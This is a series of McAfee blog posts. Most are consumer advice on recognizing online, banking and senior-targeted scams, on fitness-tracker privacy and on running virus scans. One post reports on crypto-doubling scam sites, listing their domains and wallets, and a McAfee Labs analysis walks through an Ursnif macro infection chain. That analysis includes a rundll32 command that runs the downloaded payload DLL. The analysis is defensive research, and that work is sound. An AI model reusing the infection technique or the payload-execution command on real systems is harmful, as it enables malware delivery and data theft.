Fortunately, internet scams don’t have to be a part of your online experience. In this article, we’ll tell you about some of the most common internet schemes and how you can recognize them to keep your identity safe. 

5 tips to help you recognize an online scam

Scams are scary, but you can prevent yourself from falling for one by knowing what to look for. Here are a few tell-tale signs that you’re dealing with a scammer.  

They say you’ve won a huge prize

If you get a message that you’ve won a big sum of cash in a sweepstakes you don’t remember entering, it’s a scam. Scammers may tell you that all you need to do to claim your prize is send them a small fee or give them your banking information.  

When you enter a real sweepstakes or lottery, it’s generally up to you to contact the organizer to claim your prize. Sweepstakes aren’t likely to chase you down to give you money.  

They want you to pay in a certain way

Scammers will often ask you to pay them using gift cards, money orders, cryptocurrency (like Bitcoin), or through a particular money transfer service. Scammers need payments in forms that don’t give consumers protection.  

Gift card payments, for example, are typically not reversible and hard to trace. Legitimate organizations will rarely, if ever, ask you to pay using a specific method, especially gift cards 

When you have to make online payments, it’s a good idea to use a secure service like PayPal. Secure payment systems can have features to keep you safe, like end-to-end encryption.  

They say it’s an emergency

Scammers may try to make you panic by saying you owe money to a government agency and you need to pay them immediately to avoid being arrested. Or the criminal might try to tug at your heartstrings by pretending to be a family member in danger who needs money.  

Criminals want you to pay them or give them your information quickly — before you have a chance to think about it. If someone tries to tell you to pay them immediately in a text message, phone call, or email, they’re likely a scammer 

They say they’re from a government organization or company

Many scammers pretend to be part of government organizations like the Internal Revenue Service (IRS). They’ll claim you owe them money. Criminals can even use technology to make their phone numbers appear legitimate on your caller ID.  

If someone claiming to be part of a government organization contacts you, go to that organization’s official site and find an official support number or email. Contact them to verify the information in the initial message.  

Scammers may also pretend to be businesses, like your utility company. They’ll likely say something to scare you, like your gas will be turned off if you don’t pay them right away. 

The email is littered with grammatical errors

Most legitimate organizations will thoroughly proofread any copy or information they send to consumers. Professional emails are well-written, clear, and error-free. On the other hand, scam emails will likely be full of grammar, spelling, and punctuation errors.  

It might surprise you to know that scammers write sloppy emails on purpose. The idea is that if the reader is attentive enough to spot the grammatical mistakes, they likely won’t fall for the scam 

8 most common online scams to watch out for

There are certain scams that criminals try repeatedly because they’ve worked on so many people. Here are a few of the most common scams you should watch out for.  

Phishing scams

A phishing scam can be a phone or email scam. The criminal sends a message in which they pretend to represent an organization you know. It directs you to a fraud website that collects your sensitive information, like your passwords, Social Security number (SSN), and bank account data. Once the scammer has your personal information, they can use it for personal gain.  

Phishing emails may try anything to get you to click on their fake link. They might claim to be your bank and ask you to log into your account to verify some suspicious activity. Or they could pretend to be a sweepstakes and say you need to fill out a form to claim a large reward.  

During the coronavirus pandemic, new phishing scams have emerged, with scammers claiming to be part of various charities and nonprofits. Sites like Charity Navigator can help you discern real groups from fake ones.  

Travel insurance scams

These scams also became much more prominent during the pandemic. Let’s say you’re preparing to fly to Paris with your family. A scammer sends you a message offering you an insurance policy on any travel plans you might be making. They’ll claim the policy will compensate you if your travel plans fall through for any reason without any extra charges.  

You think it might be a good idea to purchase this type of insurance. Right before leaving for your trip, you have to cancel your plans. You go to collect your insurance money only to realize the insurance company doesn’t exist.  

Real travel insurance from a licensed business generally won’t cover foreseeable events (like travel advisories, government turmoil, or pandemics) unless you buy a Cancel for Any Reason (CFAR) addendum for your policy.  

Grandparent scams

Grandparent scams prey on your instinct to protect your family. The scammer will call or send an email pretending to be a family member in some sort of emergency who needs you to wire them money. The scammer may beg you to act right away and avoid sharing their situation with any other family members. 

For example, the scammer might call and say they’re your grandchild who’s been arrested in Mexico and needs money to pay bail. They’ll say they’re in danger and need you to send funds now to save them.  

If you get a call or an email from an alleged family member requesting money, take the time to make sure they’re actually who they say they are. Never wire transfer money right away or over the phone. Ask them a question that only the family member would know and verify their story with the rest of your family.  

Advance fee scam

You get an email from a prince. They’ve recently inherited a huge fortune from a member of their royal family. Now, the prince needs to keep their money in an American bank account to keep it safe. If you let them store their money in your bank account, you’ll be handsomely rewarded. You just need to send them a small fee to get the money.  

There are several versions of this scam, but the prince iteration is a pretty common one. If you get these types of emails, don’t respond or give out your financial information.  

Tech support scams

Your online experience is rudely interrupted when a pop-up appears telling you there’s a huge virus on your computer. You need to “act fast” and contact the support phone number on the screen. If you don’t, all of your important data will be erased.  

When you call the number, a fake tech support worker asks you for remote access to your device to “fix” the problem. If you give the scammer access to your device, they may steal your personal and financial information or install malware. Worse yet, they’ll probably charge you for it.  

These scams can be pretty elaborate. A scam pop-up may even appear to be from a reputable software company. If you see this type of pop-up, don’t respond to it. Instead, try restarting or turning off your device. If the device doesn’t start back up, search for the support number for the device manufacturer and contact them directly.  

Formjacking and retail scams

Scammers will often pose as popular e-commerce companies by creating fake websites. The fake webpages might offer huge deals on social media. They’ll also likely have a URL close to the real business’s URL but slightly different. 

Sometimes, a criminal is skilled enough to hack the website of a large online retailer. When a scammer infiltrates a retailer’s website, they can redirect where the links on that site lead. This is called formjacking.  

For example, you might go to an e-commerce store to buy a jacket. You find the jacket and put it in your online shopping cart. You click “check out,” and you’re taken to a form that collects your credit card information. What you don’t know is that the checkout form is fake. Your credit card number is going directly to the scammers 

Whenever you’re redirected from a website to make a payment or enter in information, always check the URL. If the form is legitimate, it will have the same URL as the site you were on. A fake form will have a URL that’s close to but not exactly the same as the original site. 

Scareware scams (fake antivirus)

These scams are similar to tech support scams. However, instead of urging you to speak directly with a fake tech support person, their goal is to get you to download a fake antivirus software product (scareware).  

You’ll see a pop-up that says your computer has a virus, malware, or some other problem. The only way to get rid of the problem is to install the security software the pop-up links to. You think you’re downloading antivirus software that will save your computer.  

What you’re actually downloading is malicious software. There are several types of malware. The program might be ransomware that locks up your information until you pay the scammers or spyware that tracks your online activity.  

To avoid this scam, never download antivirus software from a pop-up. You’ll be much better off visiting the website of a reputable company, like McAfee, to download antivirus software 

Credit repair scams

Dealing with credit card debt can be extremely stressful. Scammers know this and try to capitalize off it. They’ll send emails posing as credit experts and tell you they can help you fix your credit or relieve some of your debt. They might even claim they can hide harmful details on your credit report. 

All you have to do is pay a small fee. Of course, after you pay the fee, the “credit expert” disappears without helping you out with your credit at all. Generally, legitimate debt settlement firms won’t charge you upfront. If a credit relief company charges you a fee upfront, that’s a red flag.  

Before you enter into an agreement with any credit service, check out their reputation. Do an online search on the company to see what you can find. If there’s nothing about the credit repair company online, it’s probably fake.  

What can you do if you get scammed online?

Admitting that you’ve fallen for an online scam can be embarrassing. But reporting a scammer can help stop them from taking advantage of anyone else. If you’ve been the victim of an online scam, try contacting your local police department and filing a report with the Federal Trade Commission (FTC).  

Several other law enforcement organizations handle different types of fraud. Here are a few examples of institutions that can help you report scams 

Discover how McAfee can keep you and your info safe online

Fraudsters shouldn’t stop you from enjoying your time online. Just by learning to spot an online scam, you can greatly strengthen your immunity to cybercrimes 

For an even greater internet experience, you’ll want the right tools to protect yourself online. McAfee’s Total Protection services can help you confidently surf the web by providing all-in-one protection for your personal info and privacy. This includes identity protection — which comes with 24/7 monitoring of your email addresses and bank accounts — and antivirus software to help safeguard your internet connection.  

Get the peace of mind that comes with McAfee having your back. 

The post How to Recognize an Online Scammer appeared first on McAfee Blog.

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Types of Online Banking Scams and How to Avoid Them

By McAfee — June 7th 2022 at 13:25

Online banking puts the ability to pay bills, check your balance, or transfer money at your fingertips. Unfortunately, it can also make you vulnerable to scammers who may try to trick you into giving them access to your account.  

By remaining vigilant, though, you can avoid common scams. This article discusses mobile banking scams and how to avoid them. 

Most common online banking scams

Online banking can be super convenient — for both you and cybercriminals. And hackers may use a variety of tactics to gain access to your accounts. Most of these involve tricking you into giving them your account information. 

Phishing scams

With this type of online scam, fraudsters may send a text message or email that looks like it’s from your bank. Often, the message will ask for immediate action, such as confirming your information to keep the account from being closed.  

The message might even include a link to the bank, but it actually goes to a fraudulent website designed to look like the bank’s website. When you enter your account information, the scammers record it. 

Sometimes, the email asks you to call a fake customer service number. If you do, you’ll speak to someone who tries to get you to give over sensitive information, like your date of birth or Social Security number (SSN). 

Occasionally, scammers already have some of your personal information. To gain your trust, they might mention personal details like your date of birth or the last four digits of your SSN. They may have learned this information from your social media posts or accessed it in a data breach. 

Cracking passwords

Another way hackers may try to access your bank account is to steal or guess your password. If they can log into your account, they can use your sensitive information for personal gain, otherwise known as identity theft. They can then open credit card accounts in your name, purchase merchandise, or transfer money out of your account. 

Cybercriminals use technology to guess billions of passwords per second. However, it’s more difficult to guess long passwords with a combination of letters and numbers.  

For example, a computer can instantly guess a password consisting of eight letters. Adding one uppercase letter extends the time it takes to crack a password to 22 minutes. In contrast, a 12-character password with an uppercase letter, a number, and a symbol would take the computer 34,000 years to crack. 

Computer viruses

When you click a link or attachment in an email or download fake antivirus software, your device can become infected with malicious software or malware. A virus can let hackers view data from your device and use it to access your financial information or bank accounts 

Consider getting antivirus software to help protect your devices, like what’s offered through McAfee Total Protection. Our award-winning antivirus software provides 24/7 real-time threat protection against online threats like malware, viruses, ransomware, and phishing, across Apple and Android systems. 

Targeting computers on public Wi-Fi networks

Public Wi-Fi gives you convenient, free access to the internet in restaurants, airports, and department stores. But it can also be easy for hackers to see your private information on an open network that doesn’t require a password.  

If you log into your online bank account, your login information could be exposed, making you vulnerable to bank fraud. Shopping online with public Wi-Fi could also expose your credit card information. 

How to avoid online banking scams

Fortunately, you can protect yourself from cybercriminals with sensible precautions and a healthy dose of suspicion. Use the tips below to help safeguard your accounts from online banking scams. 

Secure your devices with McAfee

McAfee Total Protection provides all-in-one protection for your personal information and privacy. You’ll have coverage for all of your laptops, tablets, and smartphones on most operating systems — Windows, macOS, Android, or iOS. In addition to premium antivirus software, you get identity monitoring and a secure VPN that shields your data when using public Wi-Fi. 

Carefully assess any messages claiming to be your bank

You can better recognize phishing emails once you understand how banks communicate with customers. There are certain things legitimate banks never do. If you get a message like that, assume it’s fraudulent. Some other tips include: 

  • Calling: Banks or other financial institutions don’t call for your PIN or checking account number. Never provide this over the phone. Call your bank directly using the phone number on your credit card or bank statement if you want to confirm. 
  • Email: Your bank has no reason to email you for account information it already has. If you receive an email asking you to click a link or provide account information, assume it’s fraudulent. Don’t click any links and mark the email as spam. 
  • Text messages: If a message appears to be from your bank asking you to sign in or enter your PIN, it’s a scam. Banks never ask customers for this information by text. 
  • Urgent action: A common theme in phishing emails is the urgent call to action. Cybercriminals want to scare you into acting immediately without thinking. The email says there was suspicious activity on your account, and you should log in immediately to avoid having it frozen or closed. No legitimate business would close a customer’s account without giving reasonable notice. Contact your bank through your normal channels to check your balance and account activity if you aren’t sure. 
  • Typos: Misspelled words and grammatical errors are another red flag. Major corporations have professional editors to make sure the content is correct. 

Create strong passwords and update them regularly

At some point, almost everyone has used the same password for different websites. But this is one of the simplest ways for hackers to get into your accounts. If they figure out the password for one, they can sometimes access your other accounts.  

The most common passwords are:  

  • Password  
  • 12345678 

Use unique passwords for each website. They should be 12 characters long and include numbers, lowercase letters, uppercase letters, and symbols. McAfee Total Protection includes a password manager to help generate and store your passwords in a single location. 

Always make sure you’re on the bank’s official website/app

If you get an email about an issue with your bank account, you can always go directly to your bank’s website. Don’t click any links in a text or email — just go directly to your bank’s website to check your account. Similarly, if you get a phone call, dial your bank directly using the official telephone number. 

Use two-factor authentication when logging into websites for your financial institutions. You’ll get a one-time code by text or email to use each time you log into your account. 

Be cautious of accessing your bank via public Wi-Fi

When you log onto public Wi-Fi, anyone can see your internet activity. For that reason, you shouldn’t log into your bank account with public Wi-Fi unless you’re using a virtual private network (VPN).  

McAfee Secure VPN protects your privacy by turning on automatically for unsecured networks. Your data is encrypted so it can’t be read by prying eyes. The VPN also keeps your online activity and physical location private and secure from advertisers. 

Check your bank statements regularly

Review your bank statements carefully each month to ensure there are no unauthorized transactions. Contact your bank immediately if you see any payments or withdrawals that you don’t recognize. 

See how McAfee keeps you and your data secure online 

Being vigilant and understanding how scammers work can help you avoid online banking scams. For an additional layer of security, use McAfee Total Protection. Our comprehensive cybersecurity services protect all of your devices with award-winning antivirus, a secure VPN for safe Wi-Fi connections, and advanced identity monitoring. There’s even a team of security experts available to assist you around the clock. 

With McAfee, you can bank online with ease knowing your personal data is secure. 

The post Types of Online Banking Scams and How to Avoid Them appeared first on McAfee Blog.

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Seniors: How to Keep Your Retirement Safe from Online Scams

By Toni Birdsong — June 2nd 2022 at 21:08

The growing number of internet crimes targeting senior adults is mind-blowing.

In 2021, more than 92,000 people over the age of 60 reported losses of $1.7 billion, according to IC3, the FBI’s Internet Crime division. That number reflects a 74 percent increase in losses from 2020.  

These numbers tell us a few things. They tell us that scamming the elderly is a multi-billion-dollar business for cybercriminals. It also tells us that regardless of how shoddy or obvious online scams may appear to anyone outside the senior community, they are working. 

However, information is power. Senior adults can protect their hard-earned retirement funds and government benefits by staying informed, adopting new behaviors, and putting tools in place designed to stop scammers in their tracks. And, when possible, family, friends, and caregivers can help. 

The FBI said confidence fraud and romance scams netted over $281 million in losses.  

The top four types of scams targeting seniors: Romance scams (confidence scams), fake online shopping, false utility representatives, and government agent imposters. Here’s how to make a few shifts to mindset and your daily routine and steer clear of digital deception.   

5 Safeguards to Protect Your Retirement 

  1. Stop. Don’t share. Often phone or internet scams targeting seniors carry distinctive emotional triggers of elation (you won), fear (you owe), or empathy (please help). For instance, a phony source might urge: “You must send admin fees immediately to access your sweepstake winnings.” Or “You must provide your social security number to stop this agency penalty.” FBI and Better Business Bureau fraud experts advise senior adults to stop and think before taking any action. Be aware of common phishing scams that include legitimate-looking email messages from a bank, federal agency, or service provider requesting you “verify” personal information. The number one rule: Never give out any personal information such as a Social Security number, bank account numbers, Medicare numbers, birthdate, maiden names, work history, or your address. 
  2. Level up your security. Changing times call for new tools and new behaviors online. Consider adopting best practices such as installing McAfee security software, using strong passwords with Two-Factor Authentication (2FA), and knowing how to identify phishing and malware scams are fundamental components of digital literacy. For a deeper dive into cybersecurity best practices, read more.  
  3. Discuss new scams. Scammers rapidly adjust their tactics to current events such as the pandemic, tax season, or an economic crisis to emotionally bait senior adults. If you are a senior adult, check out weekly consumer alerts from IC3 or AARP to stay on top of the types of scams you may encounter. If you are a relative or caregiver to a senior adult, stay informed, discuss these scams with your loved one, and explore other ways to help
  4. Research all charities. Senior adults get daily calls, emails, or even Facebook messages trying to bilk them of their money. It’s essential to do your research. Before donating to a charity, you can consult Give.Org or Charity Navigator to verify the request is legitimate. 
  5. Report all scams and scam attempts. If you’ve been a victim of an online scam or even targeted unsuccessfully, report the incident immediately. Any consumer can report online scams at the FBI’s IC3 website. Credit, debit, or bank account fraud should be immediately reported to your bank.   

Just as the seasons change in our lives, so too must our behaviors when connecting to people and information via our devices. Cybercriminals target older people because they assume they aren’t as informed about schemes or technically savvy as younger people. Senior adults and their loved ones can work daily to change that narrative. With the right mindset, information, and tools, seniors can connect online with confidence and enjoy their golden years without worrying about digital deception.  

The post Seniors: How to Keep Your Retirement Safe from Online Scams appeared first on McAfee Blog.

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Why You Should Care About Fitness Tracker Security

By McAfee — June 2nd 2022 at 10:41

Congratulations! You reached 10,000 steps today!

It’s a great feeling when a wearable fitness device vibrates to let you know when you hit the day’s fitness goal. The digital fireworks display that lights up your watch’s screen is a signal that you should keep on moving to challenge yourself more … or spend the rest of the day on the couch guilt-free.  

While fitness wearable devices, trackers, and apps are excellent motivators for you, cybercriminals love them for their vulnerabilities and privacy loopholes. This doesn’t mean you have to chuck your expensive watch in the bin or delete your fitness apps from your smartphone. Awareness and smart habits go a long way in deterring cybercriminals. Keep reading to learn more about wearable technology vulnerabilities and how you can sidestep each. 

Location Data  

Many fitness tracker apps and wearables are equipped with GPS. At the end of a run or long walk, you can view your exact route, sometimes with detailed maps that show street and town names. This tracking feature was potentially dangerous back in 2018 when a fitness app released a heat map of all its users’ running routes for the year, which clearly outlined secret military bases.1  

Even if you’re stationed in a suburb and not hostile territory, you may consider the risks of sharing your location data. A determined criminal who has time to spare can guess your address and see the times of days when you’re commonly out at the gym or on a run.  

Personally Identifiable Information 

When you purchase a wearable fitness device, you often have to pair it with an accompanying smartphone app to see your daily stats and tailor your fitness goals. Think about all the personally identifiable information (PII) that app now houses: your full name, password, address, height, weight, location, medical concerns, daily activity patterns, etc. In the hands of a cybercriminal, this information can bring a nefarious actor one step closer to impersonating you. Plus, if your health data makes it onto the dark web or is sold to health companies, it may result in serious privacy concerns. 

Luckily, there are ways to get peace of mind about the security of your identity. Identity protection services, such as McAfee Identity Monitoring Service, provide expert identity theft support and up to $1 million in identity theft coverage. 

Tips to Improve Your Fitness Tracker Security 

Wearable devices complement any athleisure outfit and are a fun way to inspire athletic competition between a group of friends. Here are a few ways you can patch some of their security shortcomings: 

Change the factory password settings.

When you first purchase any new device, fitness trackers included, your first step should always be to reset the factory password. Cybercriminals know that many people often skip this step, making it easy for them to walk right into new accounts. If you have a hard time remembering your passwords, consider entrusting them to a password manager to remember them for you. McAfee True Key makes it so that you only have to remember one master password to unlock the rest, and it’s protected by one of the strongest encryption algorithms available. 

Make your account private.

This is a tip you should consider for all your social media accounts. When you post about your life online, you actually divulge a lot of personal details that are helpful to cybercriminals. In the case of fitness trackers and apps, sharing the times of day when you go to the gym, are at the local track, or are on a bike path may give a criminal an idea of windows during the day when your home is empty. It’s unsettling to think that strangers can track your whereabouts, so it’s best to keep those details exclusive to people you personally know and trust. 

Turn off geolocation.

In the case of fitness trackers and apps, a savvy cybercriminal may be able take an educated guess at your address, with which they can do a myriad of nefarious activities. Some running and fitness apps may be able to still create maps of your running routes but erase street names and other landmarks to make it more private. But when in doubt, turn off geolocation.  

Stay on Track 

Fitness trackers are a fun way to stir up some friendly competition, keep connected with your fit friends, and motivate yourself to exercise and maintain healthy habits. While you’re shopping for a new device or when evaluating your current tracker, keep these tips in mind to enjoy this technology to its fullest. 

The post Why You Should Care About Fitness Tracker Security appeared first on McAfee Blog.

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Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency

By McAfee — May 26th 2022 at 06:08

By Oliver Devane 

Update: In the past 24 hours (from time of publication)  McAfee has identified 15 more scam sites bringing the total to 26. The combined value of the wallets shared on these sites is over $1,300,000 which is an increase of roughly $1,000,000 since this blog was last published. This highlights the scale of this current scam campaign. The table within this blog has been updated to include the new sites and crypto-wallets.

McAfee has identified several Youtube channels which were live-streaming a modified version of a live stream called ‘The B Word’ where Elon Musk, Cathie Wood, and Jack Dorsey discuss various aspects of cryptocurrency.  

The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them. As the topic of the video is on cryptocurrency it adds some legitimacy to the websites being advertised.  

The original video is shown below on the left and a modified one which includes a reference to a scam site is shown on the right.  

We identified several different streams occurring at a similar same time. The images of some are shown below: 

The YouTube streams advertised several sites which shared a similar theme. They claim to send cryptocurrency worth double the value which they’ve received. For example, if you send 1BTC you will receive 2BTC in return. One of the sites frequently asked questions (FAQ) is shown below: 

Here are some more examples of the scam sites we discovered: 

The sites attempt to trick the visitors into thinking that others are sending cryptocurrency to it by showing a table with recent transactions. This is fake and is generated by JavaScript which creates random crypto wallets and amounts and then adds these to the table. 

The wallets associated with the malicious sites have received a large number of transactions with a combined value of $280,000 as of 5 PM UTC on the 5th of May 2022 

Scam Site  Crypto Type  Wallet  Value as on 5PM UTC 5th May 2022 
22ark-invest[.]org  ETH  0x820a78D8e0518fcE090A9D16297924dB7941FD4f  $25,726.46 
22ark-invest[.]org  BTC  1Q3r1TzwCwQbd1dZzVM9mdFKPALFNmt2WE  $29,863.78 
2xEther[.]com  ETH  0x5081d1eC9a1624711061C75dB9438f207823E694  $2,748.50 
2x-musk[.]net  ETH  0x18E860308309f2Ab23b5ab861087cBd0b65d250A  $10,409.13 
2x-musk[.]net  BTC  17XfgcHCfpyYMFdtAWYX2QcksA77GnbHN9  $4,779.47 
arkinvest22[.]net  ETH  0x2605dF183743587594A3DBC5D99F12BB4F19ac74  $11,810.57 
arkinvest22[.]net  BTC  1GLRZZHK2fRrywVUEF83UkqafNV3GnBLha  $5,976.80 
doublecrypto22[.]com  ETH  0x12357A8e2e6B36dd6D98A2aed874D39c960eC174  $0.00 
doublecrypto22[.]com  BTC  1NKajgogVrRYQjJEQY2BcvZmGn4bXyEqdY  $0.00 
elonnew[.]com  ETH  0xAC9275b867DAb0650432429c73509A9d156922Dd  $0.00 
elonnew[.]com  BTC  1DU2H3dWXbUA9mKWuZjbqqHuGfed7JyqXu  $0.00 
elontoday[.]org  ETH  0xBD73d147970BcbccdDe3Dd9340827b679e70d9d4  $18,442.96 
elontoday[.]org  BTC  bc1qas66cgckep3lrkdrav7gy8xvn7cg4fh4d7gmw5  $0.00 
Teslabtc22[.]com  ETH  0x9B857C44C500eAf7fAfE9ed1af31523d84CB5bB0  $27,386.69 
Teslabtc22[.]com  BTC  18wJeJiu4MxDT2Ts8XJS665vsstiSv6CNK  $17,609.62 
tesla-eth[.]org  ETH  0x436F1f89c00f546bFEf42F8C8d964f1206140c64  $5,841.84 
tesla-eth[.]org  BTC  1CHRtrHVB74y8Za39X16qxPGZQ12JHG6TW  $132.22 
teslaswell[.]com  ETH  0x7007Fa3e7dB99686D337C87982a07Baf165a3C1D  $9.43 
teslaswell[.]com  BTC  bc1qdjma5kjqlf7l6fcug097s9mgukelmtdf6nm20v  $0.00 
twittergive[.]net  ETH  0xB8e257C18BbEC93A596438171e7E1E77d18671E5  $25,918.90 
twittergive[.]net  BTC  1EX3dG9GUNVxoz6yiPqqoYMQw6SwQUpa4T  $99,123.42 

Scammers have been using social media sites such as Twitter and Youtube to attempt to trick users into parting ways with their cryptocurrency for the past few years. McAfee urges its customers to be vigilant and if something sounds too good to be true then it is most likely not legitimate.  

Our customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor  

Type  Value  Product  Blocked 
URL – Crypto Scam  twittergive[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  tesla-eth[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  22ark-invest[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  2xEther[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  Teslabtc22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  elontoday[.]org  McAfee WebAdvisor  YES 
URL – Crypto Scam  elonnew[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  teslaswell[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  2x-musk[.]net  McAfee WebAdvisor  YES 
URL – Crypto Scam  doublecrypto22[.]com  McAfee WebAdvisor  YES 
URL – Crypto Scam  arkinvest22[.]net  McAfee WebAdvisor  YES 


The post Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency appeared first on McAfee Blog.

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How To Do A Virus Scan

By McAfee — May 19th 2022 at 10:23

Whether you think you might have a virus on your computer or devices, or just want to keep them running smoothly, it’s easy to do a virus scan. How to check for viruses depends on the software and device you have, so we’ll go through everything you need to know to run a scan effectively and keep your computers, phones and tablets in tip-top shape.

Do You Need a Virus Scan?

First, let’s cover a few of the telltale signs your device might have a virus. Is your computer or device acting sluggish or having a hard time booting up? Have you noticed missing files or a lack of storage space? Have you noticed emails or messages sent from your account that you did not write? Perhaps you’ve noticed changes to your browser homepage or settings? Or maybe, you’re seeing unexpected pop-up windows, or experiencing crashes and other program errors. These are all examples of signs that you may have a virus, but don’t get too worried yet, because many of these issues can be resolved with a virus scan.

What Does a Virus Scan Do?

Each antivirus program works a little differently, but in general the software will look for known malware that meets a specific set of characteristics. It may also look for variants of these known threats that have a similar code base. Some antivirus software even checks for suspicious behavior. If the software comes across a dangerous program or piece of code, it removes it. In some cases, a dangerous program can be replaced with a clean one from the manufacturer.

How to Check for Viruses

The process of checking for viruses depends on the device type and its operating system. Check out these tips to help you scan your computers, phones and tablets.

On a Windows computer

If you use Windows 10, go into “Settings” and look for the “Updates & Security” tab. From there you can locate a “Scan Now” button.

Of course, many people have invested in more robust antivirus software that has a high accuracy rate and causes less drain on their system resources, such as McAfee Total Protection. To learn how to run a virus scan using your particular antivirus software, search the software’s help menu or look online for instructions.

On a Mac computer

Mac computers don’t have a built-in antivirus program, so you will have to download security software to do a virus scan. There are some free antivirus applications available online, but we recommend investing in trusted software that can protect you from a variety of threats. Downloading free software and free online virus scans can be risky, since cybercriminals know that this is a good way to spread malware.

Whichever program you choose, follow their step-by-step instructions on how to perform a virus scan, either by searching under “help” or looking it up on their website.

On smartphones and tablets

Yes, you can get a virus on your phone or tablet, although they are less common than on computers. However, the wider category of mobile malware is on the rise and your device can get infected if you download a risky app, click on an attachment in a text message, visit a dangerous webpage, or connect to another device that has malware on it.

Fortunately, you can protect your devices with mobile security software. It doesn’t usually come installed, so you will have to download an application and follow the instructions.

Because the Android platform is an open operating system, there are a number of antivirus products for Android devices, that allows you to do a virus scan.

Apple devices are a little different because they have a closed operating system that doesn’t allow third parties to see their code. Although Apple has taken other security precautions to reduce malware risks, such as only allowing the installation of apps from Apple’s official app store, these measures aren’t the same as an antivirus program.

For more robust protection on your Apple devices, you can install mobile security software to protect the private data you have stored on your phone or tablet, such as contacts, photos and messages.

All-In-One Protection:

If safeguarding all your computers and devices individually sounds overwhelming, you can opt for a comprehensive security product that protects computers, smartphones and tablets from a central control center, making virus prevention a breeze.

Why are virus scans so important?

New online threats emerge every day, putting our personal information, money and devices at risk. In the first quarter of 2019 alone McAfee detected 504 new threats per minute, as cybercriminals employed new tactics. That’s why it is essential to stay ahead of these threats by using security software that is constantly monitoring and checking for new known threats, while safeguarding all of your sensitive information. Virus scans are an essential part of this process when it comes to identifying and removing dangerous code.

How often should you run a virus scan?

Most antivirus products are regularly scanning your computer or device in the background, so you will only need to start a manual scan if you notice something suspicious, like crashes or excessive pop-ups. You can also program regular scans on your schedule.

Preventing Viruses

Of course, the best protection is to avoid getting infected in the first place. Here are a few smart tips to sidestep viruses and other malware:

  • Learn how to surf safely so you can avoid risky websites, links and messages. This will go a long way in keeping you virus-free.
  • Never click on spammy emails or text messages. These include unsolicited advertisements and messages from people or companies you don’t know.
  • Keep the software on your computers and devices up to date. This way you are protected from known threats, such as viruses and other types of malware.
  • Invest in comprehensive security software that can protect all of your devices, such as McAfee LiveSafe.
  • Stay informed on the latest threats, so you know what to look out for. The more you know about the latest scams, the easier they will be to spot and avoid.

The post How To Do A Virus Scan appeared first on McAfee Blog.

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Phishing Campaigns featuring Ursnif Trojan on the Rise

By McAfee Labs — June 8th 2022 at 04:29

Authored by Jyothi Naveen and Kiran Raj

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible.

A recent spam campaign was using malicious word documents to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server.

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan.

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, VBA executes a malicious shellcode
  • Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it.

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe

Figure 1- flowchart of infection chain
Figure 1- flowchart of infection chain

Word Analysis

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.

Figure 2- Image of what the user sees upon opening the document
Figure 2- Image of what the user sees upon opening the document

VBA Macro Analysis of Word Document

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors..

Figure 3- Oleid output
Figure 3- Oleid output
Figure 4- Olevba output
Figure 4- Olevba output

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5

Figure 5- Obfuscated VBA macro
Figure 5- Obfuscated VBA macro

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below.

Figure 6- De-obfuscated VBA macro (stage 1)
Figure 6- De-obfuscated VBA macro (stage 1)
Figure 7- De-obfuscated VBA macro (stage 2)
Figure 7- De-obfuscated VBA macro (stage 2)

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

Figure 8- Document properties
Figure 8- Document properties

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

Figure 9- Raw Company property
Figure 9- Raw Company property

The shellcode is written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

Figure 10- Code of VirtualProtect
Figure 10- Code of VirtualProtect
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

Figure 12- Environment variable set in Winword.exe space
Figure 12- Environment variable set in Winword.exe space

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

Figure 13- SetTimer function (Execution of shellCode)
Figure 13- SetTimer function (Execution of shellCode)

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

URL  hxxp:// 
CMD  rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer 
Figure 14- Exports of Downloaded DLL
Figure 14- Exports of Downloaded DLL

After successful execution of the shellcode, the environment variable is removed. 

Figure 15- Removal of Environment Variable
Figure 15- Removal of Environment Variable


